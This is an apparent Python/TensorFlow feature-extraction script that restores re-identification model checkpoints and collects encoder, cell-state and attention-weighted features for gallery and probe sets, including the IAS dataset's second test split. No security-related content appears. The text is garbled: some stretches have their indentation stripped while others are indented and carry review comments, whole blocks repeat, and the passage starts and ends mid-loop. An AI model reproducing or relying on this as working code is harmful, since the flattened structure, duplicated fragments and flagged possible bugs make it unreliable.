if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_2_X.append(c_vec)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_0 = np.array(X)
y_0 = np.array(y)
X_pred_0 = np.array(X_pred)
t_X_pred_0 = np.array(t_X_pred)
from sklearn.preprocessing import label_binarize
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_0 = t_2_y
t_2_X_0 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_0 = t_y
t_X_0 = t_X
# checkpoint 0
_targets = np.load(
'Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/target_' + dimension + '_' + dataset + '_' + str(
time_steps) + '.npy')
_targets = _targets.reshape([-1, time_steps, series_length])
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
        # Accumulators for extracted features/labels.
        # X / y: gallery (training-split) features and identity labels.
        # t_X / t_y: probe (test) set; t_2_X / t_2_y: second IAS test set (IAS-B).
        # *_C_* variants hold contrastive-head embeddings when C_reid == '1'.
        # Several X_final_* / X_all_op buffers are initialized but never filled
        # in this pass (kept for interface compatibility).
        X = []
        C_X = []
        X_all_op = []
        X_final_op = []
        X_final_c = []
        X_final_h = []
        X_final_c1 = []
        X_final_h1 = []
        X_final_ch = []
        X_final_ch1 = []
        y = []
        C_y = []
        X_pred = []
        t_X = []
        t_C_X = []
        t_y = []
        t_C_y = []
        t_2_X = []
        t_2_C_X = []
        t_2_y = []
        t_2_C_y = []
        t_X_pred = []
        t_X_att = []
        # Sort (identity -> sample indices) maps by identity key so feature
        # extraction order is deterministic across runs.
        ids_ = sorted(ids.items(), key=lambda item:item[0])
        t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
        if dataset == 'IAS':
            t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
        # Gallery extraction: for every identity k with sample indices v, run
        # its sequences through the restored graph and collect features into X
        # (labels into y).  The feature layout is selected by `type`:
        #   'c'  -> flattened cell state, 'ch' -> hidden+cell, 'o' -> outputs,
        #   'oc' -> outputs+cell, 'att' -> attention-weighted outputs (AGEs),
        #   'attc' -> AGEs + cell state.
        # NOTE(review): `type` shadows the builtin; left as-is for compatibility.
        for k, v in ids_:
            if len(v) == 0:
                print(k)
                continue
            # Pad the identity's sample list up to a full batch by repeating
            # its first sample, so sess.run always receives batch_size rows.
            # NOTE(review): unlike the probe loop below, the padded duplicates
            # are NOT trimmed from X/y here — confirm this is intended.
            if len(v) < batch_size:
                v.extend([v[0]] * (batch_size - len(v)))
            for batch_i in range(len(v) // batch_size):
                this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
                this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
                if use_attention:
                    if Frozen == '1':
                        # Frozen encoder: fetch attention tensors, contrastive
                        # head is applied later on the assembled att_batch.
                        en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
                            encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                    else:
                        # Joint model: also fetch the contrastive vector c_vec.
                        en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
                            [encoder_output, contrast_v, encoder_c,
                             encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
                             attention_weights, alignment],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             C_lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                        if C_reid == '1':
                            C_X.extend(c_vec)
                else:
                    if Bi_LSTM:
                        en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
                            [encoder_output, encoder_output_bw, encoder_c,
                             encoder_h, encoder_c_1, encoder_h_1, predictions],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                    else:
                        en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
                            [encoder_output, encoder_c,
                             encoder_h, encoder_c_1, encoder_h_1, predictions],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                att_batch = []
                for index in range(en_outputs.shape[0]):
                    # Flattened per-sample views of encoder outputs and the
                    # two LSTM layers' cell/hidden states.
                    t1 = np.reshape(en_outputs[index], [-1]).tolist()
                    t2 = np.reshape(en_c[index], [-1]).tolist()
                    t3 = np.reshape(en_h[index], [-1]).tolist()
                    t4 = np.reshape(en_c_1[index], [-1]).tolist()
                    t5 = np.reshape(en_h_1[index], [-1]).tolist()
                    if type == 'c':
                        X.append(t2)
                    elif type == 'ch':
                        t3.extend(t2)
                        X.append(t3)
                    elif type == 'o':
                        X.append(t1)
                    elif type == 'oc':
                        t1.extend(t2)
                        X.append(t1)
                    elif type == 'att':
                        if use_attention and AGEs:
                            # AGEs: attention weights times encoder outputs.
                            weights = att_history[:, index, :]
                            f_o = en_outputs[index, :, :]
                            att_op = np.matmul(weights, f_o)
                            if manner == 'sc' or Frozen == '1':
                                att_op = np.reshape(att_op, [-1]).tolist()
                                if manner == 'sc':
                                    X.append(att_op)
                                else:
                                    # Frozen: defer to the contrastive head below.
                                    att_batch.append(att_op)
                            else:
                                # Frame-level manner: one feature row per step.
                                X.extend(att_op.tolist())
                        else:
                            f_o = en_outputs[index, :, :]
                            if Bi_LSTM:
                                # Sum forward and backward encoder outputs.
                                f_o_bw = encoder_outputs_bw[index, :, :]
                                f_o = f_o + f_o_bw
                            if manner == 'sc':
                                f_o = np.reshape(f_o, [-1]).tolist()
                                X.append(f_o)
                            else:
                                X.extend(f_o.tolist())
                    elif type == 'attc':
                        # AGEs feature concatenated with the cell state.
                        weights = att_history[:, index, :]
                        f_o = en_outputs[index, :, :]
                        att_op = np.matmul(weights, f_o)
                        att_op = np.reshape(att_op, [-1]).tolist()
                        att_op.extend(t2)
                        X.append(att_op)
                if Frozen == '1':
                    # Map the batch of AGEs features through the frozen
                    # contrastive head in one run.
                    att_batch = np.array(att_batch)
                    [c_vec] = sess.run([contrast_v],
                                {C_input: att_batch,
                                 lr: learning_rate
                                 })
                    X.extend(c_vec)
                # Reverse each predicted sequence back to forward time order.
                # NOTE(review): `pred` is not used after this point in this
                # loop (the second pass that consumed it was removed).
                pred = pred.tolist()
                for index, i in enumerate(pred):
                    pred[index].reverse()
                pred = np.array(pred)
                if manner == 'sc' or Frozen == '1' or C_reid == '1':
                    # One label per sequence.
                    y.extend([k] * batch_size)
                else:
                    # One label per frame (time_steps rows per sequence).
                    y.extend([k] * batch_size * time_steps)
# exit(1)
        # Probe (test-set) extraction: mirrors the gallery loop above, but
        # tracks `flag` (the number of padded duplicates) so padding rows can
        # be dropped from the features (en_outputs[:-flag]) and labels.
        for k, v in t_ids_:
            flag = 0
            if len(v) == 0:
                continue
            if len(v) < batch_size:
                flag = batch_size - len(v)
                v.extend([v[0]] * (batch_size - len(v)))
            for batch_i in range(len(v) // batch_size):
                this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
                this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
                if use_attention:
                    if Frozen == '1':
                        en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
                            encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                    else:
                        en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
                            [encoder_output, contrast_v, encoder_c,
                             encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
                             attention_weights, alignment],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             C_lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                        if C_reid == '1':
                            t_C_X.extend(c_vec)
                else:
                    if Bi_LSTM:
                        en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
                            [encoder_output, encoder_output_bw, encoder_c,
                             encoder_h, encoder_c_1, encoder_h_1, predictions],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                    else:
                        en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
                            [encoder_output, encoder_c,
                             encoder_h, encoder_c_1, encoder_h_1, predictions],
                            {input_data: this_input,
                             targets: this_targets,
                             lr: learning_rate,
                             target_sequence_length: [time_steps] * batch_size,
                             source_sequence_length: [time_steps] * batch_size,
                             keep_prob: 1.0})
                # Drop rows that came from batch padding.
                if flag > 0:
                    en_outputs = en_outputs[:-flag]
                att_batch = []
                for index in range(en_outputs.shape[0]):
                    t1 = np.reshape(en_outputs[index], [-1]).tolist()
                    t2 = np.reshape(en_c[index], [-1]).tolist()
                    t3 = np.reshape(en_h[index], [-1]).tolist()
                    t4 = np.reshape(en_c_1[index], [-1]).tolist()
                    t5 = np.reshape(en_h_1[index], [-1]).tolist()
                    if type == 'att':
                        if use_attention and AGEs:
                            weights = att_history[:, index, :]
                            f_o = en_outputs[index, :, :]
                            att_op = np.matmul(weights, f_o)
                            if manner == 'sc' or Frozen == '1':
                                att_op = np.reshape(att_op, [-1]).tolist()
                                if manner == 'sc':
                                    t_X.append(att_op)
                                else:
                                    att_batch.append(att_op)
                            else:
                                t_X.extend(att_op.tolist())
                                # Also keep raw attention maps for analysis.
                                t_X_att.append(weights)
                        else:
                            f_o = en_outputs[index, :, :]
                            if Bi_LSTM:
                                f_o_bw = encoder_outputs_bw[index, :, :]
                                f_o = f_o_bw + f_o
                            if manner == 'sc':
                                f_o = np.reshape(f_o, [-1]).tolist()
                                t_X.append(f_o)
                            else:
                                t_X.extend(f_o.tolist())
                    elif type == 'attc':
                        weights = att_history[:, index, :]
                        f_o = en_outputs[index, :, :]
                        att_op = np.matmul(weights, f_o)
                        att_op = np.reshape(att_op, [-1]).tolist()
                        att_op.extend(t2)
                        t_X.append(att_op)
                if Frozen == '1':
                    att_batch = np.array(att_batch)
                    [c_vec] = sess.run([contrast_v],
                                {C_input: att_batch,
                                 lr: learning_rate
                                 })
                    t_X.extend(c_vec)
                # Reverse predictions to forward time order; `pred` is unused
                # afterwards (the commented-out second pass was removed).
                pred = pred.tolist()
                for index, i in enumerate(pred):
                    pred[index].reverse()
                pred = np.array(pred)
                if manner == 'sc' or Frozen == '1' or C_reid == '1':
                    t_y.extend([k] * (batch_size - flag))
                else:
                    t_y.extend([k] * (batch_size - flag) * time_steps)
        # Second IAS test split (IAS-B): same extraction as the probe loop,
        # written into t_2_X / t_2_y.  Differences from the probe loop: no
        # 'attc' feature type, no attention-map collection, and no prediction
        # reversal.
        if dataset == 'IAS':
            for k, v in t_2_ids_:
                flag = 0
                if len(v) == 0:
                    continue
                if len(v) < batch_size:
                    flag = batch_size - len(v)
                    v.extend([v[0]] * (batch_size - len(v)))
                for batch_i in range(len(v) // batch_size):
                    this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
                    this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
                    if use_attention:
                        if Frozen == '1':
                            en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
                                [encoder_output, encoder_c,
                                 encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
                                 attention_weights, alignment],
                                {input_data: this_input,
                                 targets: this_targets,
                                 lr: learning_rate,
                                 target_sequence_length: [time_steps] * batch_size,
                                 source_sequence_length: [time_steps] * batch_size,
                                 keep_prob: 1.0})
                        else:
                            en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
                                [encoder_output, contrast_v, encoder_c,
                                 encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
                                 attention_weights, alignment],
                                {input_data: this_input,
                                 targets: this_targets,
                                 lr: learning_rate,
                                 C_lr: learning_rate,
                                 target_sequence_length: [time_steps] * batch_size,
                                 source_sequence_length: [time_steps] * batch_size,
                                 keep_prob: 1.0})
                            if C_reid == '1':
                                t_2_C_X.extend(c_vec)
                    else:
                        if Bi_LSTM:
                            en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
                                [encoder_output, encoder_output_bw, encoder_c,
                                 encoder_h, encoder_c_1, encoder_h_1, predictions],
                                {input_data: this_input,
                                 targets: this_targets,
                                 lr: learning_rate,
                                 target_sequence_length: [time_steps] * batch_size,
                                 source_sequence_length: [time_steps] * batch_size,
                                 keep_prob: 1.0})
                        else:
                            en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
                                [encoder_output, encoder_c,
                                 encoder_h, encoder_c_1, encoder_h_1, predictions],
                                {input_data: this_input,
                                 targets: this_targets,
                                 lr: learning_rate,
                                 target_sequence_length: [time_steps] * batch_size,
                                 source_sequence_length: [time_steps] * batch_size,
                                 keep_prob: 1.0})
                    # Drop rows that came from batch padding.
                    if flag > 0:
                        en_outputs = en_outputs[:-flag]
                    att_batch = []
                    for index in range(en_outputs.shape[0]):
                        t1 = np.reshape(en_outputs[index], [-1]).tolist()
                        t2 = np.reshape(en_c[index], [-1]).tolist()
                        t3 = np.reshape(en_h[index], [-1]).tolist()
                        t4 = np.reshape(en_c_1[index], [-1]).tolist()
                        t5 = np.reshape(en_h_1[index], [-1]).tolist()
                        if type == 'att':
                            if use_attention and AGEs:
                                weights = att_history[:, index, :]
                                f_o = en_outputs[index, :, :]
                                att_op = np.matmul(weights, f_o)
                                if manner == 'sc' or Frozen == '1':
                                    att_op = np.reshape(att_op, [-1]).tolist()
                                    if manner == 'sc':
                                        t_2_X.append(att_op)
                                    else:
                                        att_batch.append(att_op)
                                else:
                                    t_2_X.extend(att_op.tolist())
                            else:
                                f_o = en_outputs[index, :, :]
                                if Bi_LSTM:
                                    f_o_bw = encoder_outputs_bw[index, :, :]
                                    f_o = f_o_bw + f_o
                                if manner == 'sc':
                                    f_o = np.reshape(f_o, [-1]).tolist()
                                    t_2_X.append(f_o)
                                else:
                                    t_2_X.extend(f_o.tolist())
                    if Frozen == '1':
                        att_batch = np.array(att_batch)
                        [c_vec] = sess.run([contrast_v],
                                    {C_input: att_batch,
                                     lr: learning_rate
                                     })
                        t_2_X.extend(c_vec)
                    if manner == 'sc' or Frozen == '1' or C_reid == '1':
                        t_2_y.extend([k] * (batch_size - flag))
                    else:
                        t_2_y.extend([k] * (batch_size - flag) * time_steps)
        # Convert accumulated lists to arrays and keep *_0 snapshots of the
        # checkpoint-0 results before the buffers are reused for checkpoint 1.
        X_0 = np.array(X)
        y_0 = np.array(y)
        X_pred_0 = np.array(X_pred)
        t_X_pred_0 = np.array(t_X_pred)
        from sklearn.preprocessing import label_binarize
        # One-hot-encode probe labels over the sorted identity vocabulary.
        ids_keys = sorted(list(ids.keys()))
        t_ids_keys = sorted(list(t_ids.keys()))
        classes = [i for i in ids_keys]
        t_classes = [i for i in t_ids_keys]
        t_y = label_binarize(t_y, classes=t_classes)
        if dataset == 'IAS':
            t_2_ids_keys = sorted(list(t_2_ids.keys()))
            t_2_classes = [i for i in t_2_ids_keys]
            t_2_y = label_binarize(t_2_y, classes=t_2_classes)
            t_2_y_0 = t_2_y
            t_2_X_0 = t_2_X
        t_y = np.array(t_y)
        if C_reid == '1':
            t_C_X = np.array(t_C_X)
        else:
            t_X = np.array(t_X)
        # NOTE(review): t_X_0 is assigned even when C_reid == '1', in which
        # case t_X was never converted to an array above — confirm intended.
        t_y_0 = t_y
        t_X_0 = t_X
# checkpoint 1
_targets = np.concatenate((_input_data[1:, :, :], _input_data[-1, :, :].reshape([1, time_steps, series_length])),
axis=0)
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint_1 + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
        # Re-initialize all feature/label accumulators for the checkpoint-1
        # pass (the checkpoint-0 results were snapshotted into *_0 above).
        X = []
        C_X = []
        X_all_op = []
        X_final_op = []
        X_final_c = []
        X_final_h = []
        X_final_c1 = []
        X_final_h1 = []
        X_final_ch = []
        X_final_ch1 = []
        y = []
        C_y = []
        X_pred = []
        t_X = []
        t_C_X = []
        t_y = []
        t_C_y = []
        t_2_X = []
        t_2_C_X = []
        t_2_y = []
        t_2_C_y = []
        t_X_pred = []
        t_X_att = []
        # Deterministic identity order, as in the checkpoint-0 pass.
        ids_ = sorted(ids.items(), key=lambda item:item[0])
        t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
        if dataset == 'IAS':
            t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
# else:
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# X.append(c_vec)
else:
X.extend(att_op.tolist())
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# # if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# att_batch.append(att_op)
# att_batch = np.array(att_batch)
# _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'c':
# X_pred.append(t2)
# elif type == 'ch':
# t3.extend(t2)
# X_pred.append(t3)
# elif type == 'o':
# X_pred.append(t1)
# elif type == 'oc':
# t1.extend(t2)
# X_pred.append(t1)
# elif type == 'att':
